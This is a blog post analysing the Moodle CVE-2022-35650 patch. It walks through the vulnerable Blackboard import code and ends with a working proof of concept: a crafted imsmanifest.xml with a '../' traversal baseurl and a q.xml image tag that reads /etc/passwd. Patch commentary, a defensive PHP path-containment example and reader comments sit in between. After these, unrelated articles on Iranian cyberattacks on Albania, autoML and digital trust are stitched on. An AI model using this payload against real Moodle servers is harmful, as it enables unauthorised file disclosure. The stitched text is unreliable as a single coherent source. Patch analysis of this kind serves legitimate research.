CVE-2022-35650 Analysis

The vulnerability was found in Moodle and is caused by an input validation error when importing lesson questions. Insufficient path checks result in an arbitrary file read risk, allowing a remote attacker to perform directory traversal attacks. By default, the capability to access this feature is only available to teachers, managers and admins.

I’ve been wanting to write a blog post about 1-day analysis for a long time, especially in PHP. In this post, I’ll talk about what approach you should take when analyzing a 1-day CVE patch and how to make a PoC for it.

Setup Debugging environment for PHP

sudo apt install php-xdebug

nano /etc/php/7.4/mods-available/xdebug.ini

zend_extension=/usr/lib64/php/modules/xdebug.so
xdebug.remote_autostart = 1
xdebug.remote_enable = 1
xdebug.remote_handler = dbgp
xdebug.remote_host = 127.0.0.1
xdebug.remote_mode = req
xdebug.remote_port = 9000

Install Xdebug extension:

Make a launch.json file with the following contents in the .vscode directory:

{
    // Use IntelliSense to learn about possible attributes.
    // Hover to view descriptions of existing attributes.
    // For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
    "version": "0.2.0",
    "configurations": [
        {
            "name": "Listen for Xdebug",
            "type": "php",
            "request": "launch",
            "port": 9000
        },
        {
            "name": "Launch currently open script",
            "type": "php",
            "request": "launch",
            "program": "${file}",
            "cwd": "${fileDirname}",
            "port": 0,
            "runtimeArgs": [
                "-dxdebug.start_with_request=yes"
            ],
            "env": {
                "XDEBUG_MODE": "debug,develop",
                "XDEBUG_CONFIG": "client_port=${port}"
            }
        }
    ]
}

Patch Diffing

The git commit that fixes this vulnerability can be found at this link.

--- a/question/format/blackboard_six/format.php
+++ b/question/format/blackboard_six/format.php
@@ -152,7 +152,8 @@ class qformat_blackboard_six extends qformat_blackboard_six_base {
                     }
                     if ($examfile->getAttribute('type') == 'assessment/x-bb-pool') {
                         if ($examfile->getAttribute('baseurl')) {
-                            $fileobj->filebase = $this->tempdir. '/' . $examfile->getAttribute('baseurl');
+                            $fileobj->filebase = clean_param($this->tempdir . '/'
+                                . $examfile->getAttribute('baseurl'), PARAM_SAFEPATH);
                         }
                         if ($content = $this->get_filecontent($examfile->getAttribute('file'))) {
                             $fileobj->filetype = self::FILETYPE_POOL;
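
Review bot: clean_param() on the added lines wraps the whole concatenation, so the server-chosen prefix $this->tempdir is filtered together with the untrusted baseurl attribute, and any character in the temp directory path that PARAM_SAFEPATH does not allow would be altered as well. Consider cleaning only $examfile->getAttribute('baseurl') before joining it to $this->tempdir, and failing the import when the cleaned value differs from the original instead of continuing with a silently rewritten path. The get_filecontent($examfile->getAttribute('file')) call in the trailing context takes another manifest attribute and is not touched here, so it is worth confirming that this path is validated elsewhere.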

The change shows that in the old version the filebase property of the fileobj object is built directly from getAttribute('baseurl'), while in the patched version the value is sanitized by the clean_param function.

Analysis

The code above is responsible for importing Blackboard-type questions into the Question bank.

...
$this->tempdir = make_temp_directory('bbquiz_import/' . $uniquecode);
        if (is_readable($filename)) {
            if (!copy($filename, $this->tempdir . '/bboard.zip')) {
                $this->error(get_string('cannotcopybackup', 'question'));
                fulldelete($this->tempdir);
                return false;
            }
            $packer = get_file_packer('application/zip');
            if ($packer->extract_to_pathname($this->tempdir . '/bboard.zip', $this->tempdir)) {
                $dom = new DomDocument();

                if (!$dom->load($this->tempdir . '/imsmanifest.xml')) {
                    $this->error(get_string('errormanifest', 'qformat_blackboard_six'));
                    fulldelete($this->tempdir);
                    return false;
                }

                $xpath = new DOMXPath($dom);

                // We starts from the root element.
                $query = '//resources/resource';
                $qfile = array();

                $examfiles = $xpath->query($query);
                foreach ($examfiles as $examfile) {
                    $fileobj = new qformat_blackboard_six_file();

                    if ($examfile->getAttribute('type') == 'assessment/x-bb-qti-test'
                            || $examfile->getAttribute('type') == 'assessment/x-bb-qti-pool') {

                        if ($content = $this->get_filecontent($examfile->getAttribute('bb:file'))) {
                            $fileobj->filetype = self::FILETYPE_QTI;
                            $fileobj->filebase = $this->tempdir;
                            $fileobj->text = $content;
                            $qfile[] = $fileobj;
                        }
                    }
                     if ($examfile->getAttribute('type') == 'assessment/x-bb-pool') {
                        if ($examfile->getAttribute('baseurl')) {
                            $fileobj->filebase = $this->tempdir. '/' . $examfile->getAttribute('baseurl');
                        }
                        if ($content = $this->get_filecontent($examfile->getAttribute('file'))) {
                            $fileobj->filetype = self::FILETYPE_POOL;
                            $fileobj->text = $content;
                            $qfile[] = $fileobj;
                        }
                    }
                }

                if ($qfile) {
                    return $qfile;

...

The code makes a temp directory, extracts the Blackboard archive into it, and then reads the imsmanifest.xml file from it.

Then, with an XPath query, it retrieves all resource elements, creates an object of the qformat_blackboard_six_file class for each one, and checks the type attribute of the resource element. As you saw in the patch diff, the vulnerability happens if the type is assessment/x-bb-pool, so we can make a zip archive with the following imsmanifest.xml file to test whether we are right:

<?xml version="1.0" encoding="UTF-8"?>
<manifest >
	<resources>
		<resource type="assessment/x-bb-pool" baseurl="test">
		test
		</resource>
	</resources>
</manifest>
import question bank

We will set a breakpoint on this line:

Great, we just found the right way and we can continue 🙂

Then the code gets the baseurl attribute and, if it exists, sets $fileobj->filebase to $this->tempdir. '/' . $examfile->getAttribute('baseurl');

Did you notice something?

We have full control over the baseurl attribute, so we can do a directory traversal attack and set $fileobj->filebase to any location. Great, what is next?

The get_filecontent function will be called with the file attribute as its parameter.

get_filecontent function:

At this point, you may think that we can control $path and perform a directory traversal, but that’s wrong, and you will see why.

We actually can control $path from the path attribute of the resource element, but if you follow the stack trace you will notice that it returns an error, because the returned content must be a valid XML file of type blackboard pool ( ͡° ͜ʖ ͡°)

The readdata function is called, and after it readquestions is called with $lines, which is the readdata output.

As you saw, we can set $fileobj->text to arbitrary file content, but the readquestions function calls the readquestions function of the qformat_blackboard_six_pool class with $fileobj->text, which could be the content of any file in the filesystem:

The readquestions function tries to parse $text with the xmlize function and returns an error if $text is not valid XML. So, as I said, even if we control $path in the function above and try to read a file that is not a valid XML file, we get an error here and cannot do anything useful ( ͡° ͜ʖ ͡°)

Let’s go back to filebase.

The readquestions function of the qformat_blackboard_six class calls the set_filebase function of the qformat_blackboard_six_base class, so let’s see where filebase is used:

The code above takes $text as its parameter and uses a regex to extract the value of the src attribute from img tags in $text.

In order to reach this function we have to set the file attribute of the resource element to a valid blackboard pool XML file. Fortunately, we can find a sample in the tests directory: fixtures/sample_blackboard_pool.dat

<?xml version='1.0' encoding='utf-8'?>
<POOL>
    <TITLE value='exam 3 2008-9'/>
    <QUESTIONLIST>
        <QUESTION id='q1' class='QUESTION_TRUEFALSE' points='1'/>
        <QUESTION id='q7' class='QUESTION_MULTIPLECHOICE' points='1'/>
        <QUESTION id='q8' class='QUESTION_MULTIPLEANSWER' points='1'/>
        <QUESTION id='q39-44' class='QUESTION_MATCH' points='1'/>
        <QUESTION id='q9' class='QUESTION_ESSAY' points='1'/>
        <QUESTION id='q27' class='QUESTION_FILLINBLANK' points='1'/>
    </QUESTIONLIST>
    <QUESTION_TRUEFALSE id='q1'>
        <BODY>
            <TEXT><![CDATA[<h1> He Heeeeeeeeeeee</h1>]]></TEXT>
            <FLAGS>
                <ISHTML value='true'/>
                <ISNEWLINELITERAL value='false'/>
            </FLAGS>
        </BODY>
        <ANSWER id='q1_a1'>
            <TEXT>False</TEXT>
        </ANSWER>
        <ANSWER id='q1_a2'>
            <TEXT>True</TEXT>
        </ANSWER>
        <GRADABLE>
            <CORRECTANSWER answer_id='q1_a2'/>
            <FEEDBACK_WHEN_CORRECT><![CDATA[You gave the right answer.]]></FEEDBACK_WHEN_CORRECT>
            <FEEDBACK_WHEN_INCORRECT><![CDATA[42 is the Ultimate Answer.]]></FEEDBACK_WHEN_INCORRECT>
        </GRADABLE>
    </QUESTION_TRUEFALSE>
    <QUESTION_MULTIPLECHOICE id='q7'>
        <BODY>
            <TEXT><![CDATA[<span style="font-size:12pt">What's between orange and green in the spectrum?</span>]]></TEXT>
            <FLAGS>
                <ISHTML value='true'/>
                <ISNEWLINELITERAL value='false'/>
            </FLAGS>
        </BODY>
        <ANSWER id='q7_a1' position='1'>
        <TEXT><![CDATA[<span style="font-size:12pt">red</span>]]></TEXT>
        </ANSWER>
        <ANSWER id='q7_a2' position='2'>
        <TEXT><![CDATA[<span style="font-size:12pt">yellow</span>]]></TEXT>
        </ANSWER>
        <ANSWER id='q7_a3' position='3'>
        <TEXT><![CDATA[<span style="font-size:12pt">blue</span>]]></TEXT>
        </ANSWER>
        <GRADABLE>
            <CORRECTANSWER answer_id='q7_a2'/>
            <FEEDBACK_WHEN_CORRECT><![CDATA[You gave the right answer.]]></FEEDBACK_WHEN_CORRECT>
            <FEEDBACK_WHEN_INCORRECT><![CDATA[Only yellow is between orange and green in the spectrum.]]></FEEDBACK_WHEN_INCORRECT>
        </GRADABLE>
    </QUESTION_MULTIPLECHOICE>
    <QUESTION_MULTIPLEANSWER id='q8'>
        <BODY>
            <TEXT><![CDATA[<span style="font-size:12pt">What's between orange and green in the spectrum?</span>]]></TEXT>
            <FLAGS>
                <ISHTML value='true'/>
                <ISNEWLINELITERAL value='false'/>
            </FLAGS>
        </BODY>
        <ANSWER id='q8_a1' position='1'>
        <TEXT><![CDATA[<span style="font-size:12pt">yellow</span>]]></TEXT>
        </ANSWER>
        <ANSWER id='q8_a2' position='2'>
        <TEXT><![CDATA[<span style="font-size:12pt">red</span>]]></TEXT>
        </ANSWER>
        <ANSWER id='q8_a3' position='3'>
        <TEXT><![CDATA[<span style="font-size:12pt">off-beige</span>]]></TEXT>
        </ANSWER>
        <ANSWER id='q8_a4' position='4'>
        <TEXT><![CDATA[<span style="font-size:12pt">blue</span>]]></TEXT>
        </ANSWER>
        <GRADABLE>
            <CORRECTANSWER answer_id='q8_a1'/>
            <CORRECTANSWER answer_id='q8_a3'/>
            <FEEDBACK_WHEN_CORRECT><![CDATA[You gave the right answer.]]></FEEDBACK_WHEN_CORRECT>
            <FEEDBACK_WHEN_INCORRECT><![CDATA[Only yellow and off-beige are between orange and green in the spectrum.]]></FEEDBACK_WHEN_INCORRECT>
        </GRADABLE>
    </QUESTION_MULTIPLEANSWER>
    <QUESTION_MATCH id='q39-44'>
        <BODY>
            <TEXT><![CDATA[<i>Classify the animals.</i>]]></TEXT>
            <FLAGS>
                <ISHTML value='true'/>
                <ISNEWLINELITERAL value='false'/>
            </FLAGS>
        </BODY>
        <ANSWER id='q39-44_a1' position='1'>
            <TEXT><![CDATA[frog]]></TEXT>
        </ANSWER>
        <ANSWER id='q39-44_a2' position='2'>
            <TEXT><![CDATA[cat]]></TEXT>
        </ANSWER>
        <ANSWER id='q39-44_a3' position='3'>
            <TEXT><![CDATA[newt]]></TEXT>
        </ANSWER>
        <CHOICE id='q39-44_c1' position='1'>
            <TEXT><![CDATA[mammal]]></TEXT>
        </CHOICE>
        <CHOICE id='q39-44_c2' position='2'>
            <TEXT><![CDATA[insect]]></TEXT>
        </CHOICE>
        <CHOICE id='q39-44_c3' position='3'>
            <TEXT><![CDATA[amphibian]]></TEXT>
        </CHOICE>
        <GRADABLE>
            <CORRECTANSWER answer_id='q39-44_a1' choice_id='q39-44_c3'/>
            <CORRECTANSWER answer_id='q39-44_a2' choice_id='q39-44_c1'/>
            <CORRECTANSWER answer_id='q39-44_a3' choice_id='q39-44_c3'/>
        </GRADABLE>
    </QUESTION_MATCH>
    <QUESTION_ESSAY id='q9'>
        <BODY>
            <TEXT><![CDATA[How are you?]]></TEXT>
            <FLAGS>
                <ISHTML value='true'/>
                <ISNEWLINELITERAL value='false'/>
            </FLAGS>
        </BODY>
        <ANSWER id='q9_a1'>
            <TEXT><![CDATA[Blackboard answer for essay questions will be imported as informations for graders.]]></TEXT>
        </ANSWER>
        <GRADABLE>
        </GRADABLE>
    </QUESTION_ESSAY>
    <QUESTION_FILLINBLANK id='q27'>
        <BODY>
            <TEXT><![CDATA[<span style="font-size:12pt">Name an amphibian: __________.</span>]]></TEXT>
            <FLAGS>
                <ISHTML value='true'/>
                <ISNEWLINELITERAL value='false'/>
            </FLAGS>
        </BODY>
        <ANSWER id='q27_a1' position='1'>
            <TEXT>frog</TEXT>
        </ANSWER>
        <GRADABLE>
        </GRADABLE>
    </QUESTION_FILLINBLANK>
</POOL>

As you saw in the code, it tries to extract the image source file from the HTML defined in the TEXT element.

After extracting it, the code builds a variable called $fullpath with the value $this->filebase . '/' . $path, and $this->filebase is under our control, as I showed.

If $fullpath is a readable file, the code calls store_file_for_text_field, so let’s set the baseurl in imsmanifest.xml and the value of the src attribute in q.xml to make $fullpath point to a valid file:

...
<TEXT><![CDATA[<img src="passwd">]]></TEXT>
...
<?xml version="1.0" encoding="UTF-8"?>
<manifest >
	<resources>
		<resource type="assessment/x-bb-pool" baseurl="../../../../../../../etc" file="q.xml">
		test
		</resource>
	</resources>
</manifest>
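
One way to enforce that every path the importer derives from the archive stays inside the extraction directory, as an added example that is neither Moodle's code nor its patch (which uses clean_param). contained_path() and check_manifest() are hypothetical helpers, the scratch directory and manifests are constructed, and treating the file attribute as relative to the temp directory is an assumption.

```php
<?php
// Added example, not Moodle code. contained_path() and check_manifest() are
// hypothetical helpers; the patch itself uses clean_param(..., PARAM_SAFEPATH).

/**
 * Resolve $base/$relative and return it only if it stays inside $root.
 * realpath() collapses "..", "." and symlinks, so the comparison is made on
 * canonical paths. Returns null for anything missing or outside $root.
 */
function contained_path(string $root, string $base, string $relative): ?string {
    $rootreal = realpath($root);
    $target = realpath($base . '/' . $relative);
    if ($rootreal === false || $target === false) {
        return null;
    }
    // Trailing separator so that /tmp/import does not match /tmp/import_evil.
    $prefix = rtrim($rootreal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target . DIRECTORY_SEPARATOR, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

/**
 * Apply the check to each assessment/x-bb-pool resource of a manifest.
 * Assumption: both baseurl and file are meant to be relative to $tempdir.
 * Returns a list of findings; an empty list means nothing escaped $tempdir.
 */
function check_manifest(string $tempdir, string $manifestxml): array {
    $dom = new DOMDocument();
    if (!@$dom->loadXML($manifestxml, LIBXML_NONET)) {
        return ['manifest is not well-formed XML'];
    }
    $findings = [];
    $xpath = new DOMXPath($dom);
    foreach ($xpath->query('//resources/resource') as $resource) {
        if ($resource->getAttribute('type') !== 'assessment/x-bb-pool') {
            continue;
        }
        foreach (['baseurl', 'file'] as $attr) {
            $value = $resource->getAttribute($attr);
            if ($value !== '' && contained_path($tempdir, $tempdir, $value) === null) {
                $findings[] = "$attr=\"$value\" does not resolve inside the extraction directory";
            }
        }
    }
    return $findings;
}

// Constructed sample data: a scratch extraction directory and two manifests.
$tempdir = sys_get_temp_dir() . '/bbquiz_import_demo_' . bin2hex(random_bytes(4));
mkdir($tempdir . '/media', 0700, true);
file_put_contents($tempdir . '/q.xml', '<POOL/>');
file_put_contents($tempdir . '/media/pic.png', 'constructed placeholder');

$template = '<manifest><resources><resource type="assessment/x-bb-pool" '
    . 'baseurl="%s" file="q.xml"/></resources></manifest>';
$benign = sprintf($template, 'media');
$traversal = sprintf($template, '../../../../../../../etc'); // baseurl value from the page

echo "benign manifest findings:\n";
print_r(check_manifest($tempdir, $benign));
echo "traversal manifest findings:\n";
print_r(check_manifest($tempdir, $traversal));

// The image lookup, mirroring $fullpath = $this->filebase . '/' . $path.
echo "contained image path: ";
var_dump(contained_path($tempdir, $tempdir . '/media', 'pic.png'));
echo "page's baseurl plus src: ";
var_dump(contained_path($tempdir, $tempdir . '/../../../../../../../etc', 'passwd'));

// Remove the scratch directory.
unlink($tempdir . '/media/pic.png');
unlink($tempdir . '/q.xml');
rmdir($tempdir . '/media');
rmdir($tempdir);
```

A target that does not exist is rejected the same way as one that escapes the directory, so the caller never reads from a path it could not canonicalize.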

Here is the store_file_for_text_field function:

As you can see, it finally calls create_file_from_pathname, and the second parameter, which is the location of the file in the filesystem, is under our control, so we can make it point to any file in the filesystem.

( ͡° ͜ʖ ͡°)

Final PoC

imsmanifest.xml:

<?xml version="1.0" encoding="UTF-8"?>
<manifest >
	<resources>
		<resource type="assessment/x-bb-pool" baseurl="../../../../../../../etc" file="q.xml">
		test
		</resource>
	</resources>
</manifest>

q.xml:

<?xml version='1.0' encoding='utf-8'?>
<POOL>
    <TITLE value='PoC exam'/>
    <QUESTIONLIST>
        <QUESTION id='q1' class='QUESTION_TRUEFALSE' points='1'/>
    </QUESTIONLIST>
    <QUESTION_TRUEFALSE id='q1'>
        <BODY>
            <TEXT><![CDATA[<img src="passwd">]]></TEXT>
            <FLAGS>
                <ISHTML value='true'/>
                <ISNEWLINELITERAL value='false'/>
            </FLAGS>
        </BODY>
        <ANSWER id='q1_a1'>
            <TEXT>False</TEXT>
        </ANSWER>
        <ANSWER id='q1_a2'>
            <TEXT>True</TEXT>
        </ANSWER>
        <GRADABLE>
            <CORRECTANSWER answer_id='q1_a2'/>
            <FEEDBACK_WHEN_CORRECT><![CDATA[You gave the right answer.]]></FEEDBACK_WHEN_CORRECT>
            <FEEDBACK_WHEN_INCORRECT><![CDATA[42 is the Ultimate Answer.]]></FEEDBACK_WHEN_INCORRECT>
        </GRADABLE>
    </QUESTION_TRUEFALSE>
</POOL>

We can view the file:

Preview the imported question

You will find the location of the file here:

/etc/passwd content

It seems to compute nicely! *grins*

Hello, congratulations on finding this bug
I tested this POC but it doesn’t work.
I combine all poc xml file in zip file and submit that but it doesn’t work and its src address of img tag is ‘passwd’.
Can you help me to prove it?
thanks for your attention

Hi, Thank you
I don’t find this bug, the purpose of this blog post is also not to show this bug but patch analysis and debugging in PHP, I chose this CVE randomly.
Since the bug is path traversal and the prefix of the path depends on the Moodle data directory, maybe you need to add more ../

Iranian Hackers likely Behind Disruptive Cyberattacks Against Albanian Government

A threat actor working to further Iranian goals is said to have been behind a set of disruptive cyberattacks against Albanian government services in mid-July 2022.

Cybersecurity firm Mandiant said the malicious activity against a NATO state represented a “geographic expansion of Iranian disruptive cyber operations.”

The July 17 attacks, according to Albania’s National Agency of Information Society, forced the government to “temporarily close access to online public services and other government websites” because of a “synchronized and sophisticated cybercriminal attack from outside Albania.”

The politically motivated disruptive operation, per Mandiant, entailed the deployment of a new ransomware family called ROADSWEEP that included a ransom note with the text: “Why should our taxes be spent on the benefit of DURRES terrorists?”

A front named HomeLand Justice has since claimed credit for the cyber offensive, with the group also allegedly claiming to have used a wiper malware in the attacks. Although the exact nature of the wiper is unclear as yet, Mandiant said an Albanian user submitted a sample for what’s called ZeroCleare on July 19, coinciding with the attacks.

ZeroCleare, first documented by IBM in December 2019 as part of a campaign targeting the industrial and energy sectors in the Middle East, is designed to wipe the master boot record (MBR) and disk partitions on Windows-based machines. It’s believed to be a collaborative effort between different Iranian nation-state actors, including OilRig (aka APT34, ITG13, or Helix Kitten).

Also deployed in the Albanian attacks was a previously unknown backdoor dubbed CHIMNEYSWEEP that’s capable of taking screenshots, listing and collecting files, spawning a reverse shell, and supporting keylogging functionality.

The implant, besides sharing numerous code overlaps with ROADSWEEP, is delivered to the system via a self-extracting archive alongside decoy Microsoft Word documents that contain images of Massoud Rajavi, the erstwhile leader of People’s Mojahedin Organization of Iran (MEK).

The earliest iterations of CHIMNEYSWEEP date back to 2012 and indications are that the malware may have been utilized in attacks aimed at Farsi and Arabic speakers.

The cybersecurity firm, which was acquired by Google earlier this year, said it didn’t have enough evidence linking the intrusions to a named adversarial collective, but noted with moderate confidence that one or more bad actors operating in support of Iran’s objectives are involved.

The connections to Iran stem from the fact that the attacks took place less than a week prior to the World Summit of Free Iran conference on July 23-24 near the port city of Durres by entities opposing the Iranian government, particularly the members of the MEK.

“The use of ransomware to conduct a politically motivated disruptive operation against the government websites and citizen services of a NATO member state in the same week an Iranian opposition groups’ conference was set to take place would be a notably brazen operation by Iran-nexus threat actors,” the researchers said.

The findings also come two months after the Iranian advanced persistent threat (APT) group tracked as Charming Kitten (aka Phosphorus) was linked to an attack directed against an unnamed construction company in the southern U.S.

Automated techniques could make it easier to develop AI

“BERT takes months of computation and is very expensive—like, a million dollars to generate that model and repeat those processes,” Bahrami says. “So if everyone wants to do the same thing, then it’s expensive—it’s not energy efficient, not good for the world.” 

Although the field shows promise, researchers are still searching for ways to make autoML techniques more computationally efficient. For example, methods like neural architecture search currently build and test many different models to find the best fit, and the energy it takes to complete all those iterations can be significant.

AutoML techniques can also be applied to machine-learning algorithms that don’t involve neural networks, like creating random decision forests or support-vector machines to classify data. Research in those areas is further along, with many coding libraries already available for people who want to incorporate autoML techniques into their projects. 

The next step is to use autoML to quantify uncertainty and address questions of trustworthiness and fairness in the algorithms, says Hutter, a conference organizer. In that vision, standards around trustworthiness and fairness would be akin to any other machine-learning constraints, like accuracy. And autoML could capture and automatically correct biases found in those algorithms before they’re released.

The search continues

But for something like deep learning, autoML still has a long way to go. Data used to train deep-learning models, like images, documents, and recorded speech, is usually dense and complicated. It takes immense computational power to handle. The cost and time for training these models can be prohibitive for anyone other than researchers working at deep-pocketed private companies.

One of the competitions at the conference asked participants to develop energy-efficient alternative algorithms for neural architecture search. It’s a considerable challenge because this technique has infamous computational demands. It automatically cycles through countless deep-learning models to help researchers pick the right one for their application, but the process can take months and cost over a million dollars. 

The goal of these alternative algorithms, called zero-cost neural architecture search proxies, is to make neural architecture search more accessible and environmentally friendly by significantly cutting down on its appetite for computation. The result takes only a few seconds to run, instead of months. These techniques are still in the early stages of development and are often unreliable, but machine-learning researchers predict that they have the potential to make the model selection process much more efficient.

Eliminating the lack of digital trust

With the proliferation of technology, rebuilding digital trust has become very important.
Today’s reliance on digital is under pressure to change in all areas of commerce, work, lifestyle, transportation, education and healthcare. In today’s “extremely connected world”, “digital trust” is very important.

What is “Digital Trust”?

“Digital Trust” can be defined as “social trust in the ability of digital technology and the organizations that provide it to protect the public interest.” Trust in digital technology will become an increasingly important issue for society and governance. In addition, gaining trust in digital technology requires an appropriate security and governance framework and the use of responsible and ethical techniques and data.
Unfortunately, it’s hard to say that the public trusts in the protection of personal data in businesses and governments, and the impact of modern technology on decision-making. According to the World Economic Forum, the lack of trust is real and growing. Challenges include lack of security, ethical flaws, and inadequate transparency.
The World Economic Forum’s Digital Trust Initiative continues to work to form a global consensus on what digital technology is credible and what can be done to improve it.
The World Economic Forum also warns that “declining trust due to anxiety about how some organizations use digital technology can undermine the social benefits of digitalization.”
In addition to these World Economic Forum efforts, it is encouraging that regulators have broad views on the need to protect privacy and address the growing threat of cyberattacks. Regulators are also exploring how to regulate completely different worlds such as machine learning, artificial intelligence (AI), and the Metaverse.
In a situation of accelerating innovation and increasing reliance on digital systems, truly effective regulation will need to strike a complex balance among social concerns, corporate credit problems, and the role of governments in driving progress.

Turn digital challenges into opportunities

The urgent need to eliminate the lack of trust is, from a different perspective, a great opportunity for companies to be proactive in using technology and data. Recognizing this opportunity, companies can move wisely towards solving the challenges of digital trust, aiming to demonstrate true accountability and transparency and to link social awareness and progress to their brand and reputation.
Being able to reliably and consistently explain that a company is responsible for collecting data and making data-based decisions will provide a new level of transparency and enhance credibility, which will be highly significant. It will also increase confidence in digital technologies used in every aspect of our lives, from life-sustaining medical devices to smarter critical infrastructures.
From the perspective of a conscious and active global consumer, an informed and proactive approach is an important differentiator for a company. Leading companies that recognize the value of working to improve the reliability of digital technology can also anticipate issues with regulatory agencies. This means that organizations provide the resources they need to exceed today’s regulatory requirements.

Leverage the power of social dialogue

On the issue of digital trust, it is imperative to promote well-informed social dialogue. We need to achieve constructive dialogue in an open space as soon as possible, but it is by no means easy.
How will the challenge of digital trust be met, and who among consumers, businesses, regulators and governments will lead the public debate on it? Perhaps some of the world’s leading companies are on the path to improving their brands while advocating social responsibility for consumer data protection. In addition, new trust frameworks, certifications and rating services are expected to be developed as governments, consumers and investors demand transparency and credibility in their organizations’ approaches.
The World Economic Forum said:
“Digital trust is essential in a global economy that relies on connectivity, data utilization, and new innovations. To be reliable, technology must be secure, ensuring the confidentiality, completeness and availability of connected systems, and it must be used responsibly.”
And to build a new world with safe and reliable digital capabilities, we need the power of everyone in our society.
This article is a translation of “Reversing the digital trust deficit” published by KPMG International in May 2022. If there is a discrepancy between the translation and the original English text, the original English text shall prevail.